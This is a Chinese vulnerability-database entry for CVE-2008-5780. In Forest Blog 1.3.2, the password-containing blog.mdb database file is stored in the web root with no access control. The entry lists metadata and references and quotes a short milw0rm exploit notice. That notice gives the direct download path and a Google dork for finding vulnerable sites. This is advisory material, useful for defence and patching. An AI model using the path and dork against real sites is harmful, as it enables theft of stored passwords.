Hostforest forest blog 'blog.mdb'数据库泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117059 漏洞类型 权限许可和访问控制
发布时间 2008-12-15 更新时间 2008-12-30
CVE编号 CVE-2008-5780 CNNVD-ID CNNVD-200812-503
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7466
https://www.securityfocus.com/bid/84634
https://cxsecurity.com/issue/WLB-2009010105
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-503
|漏洞详情
ForestBlog是一个基于ASP的多功能的blog应用程序,支持MSSQL和MySQL数据库。ForestBlog1.3.2版本在web根下储存敏感信息而未赋予足够的访问控制,这使得远程攻击者可以借助一个对blog.mdb的直接请求,下载包含密码的数据库文件。
|漏洞EXP
< > =============
< >
< >  Forest Blog v1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability
< >
< >  auther : Cold z3ro, www.hackteach.org
< >
< >  http://site.com/[Path]/blog.mdb
< >
< >  Dork : Powered By: Forest Blog v1.3.2
< >
< > =============

# milw0rm.com [2008-12-15]
|受影响的产品
Hostforest Forest Blog 1.3.2
|参考资料

来源:XF
名称:forestblog-blog-info-disclosure(47359)
链接:http://xforce.iss.net/xforce/xfdb/47359
来源:MILW0RM
名称:7466
链接:http://www.milw0rm.com/exploits/7466
来源:SREASON
名称:4842
链接:http://securityreason.com/securityalert/4842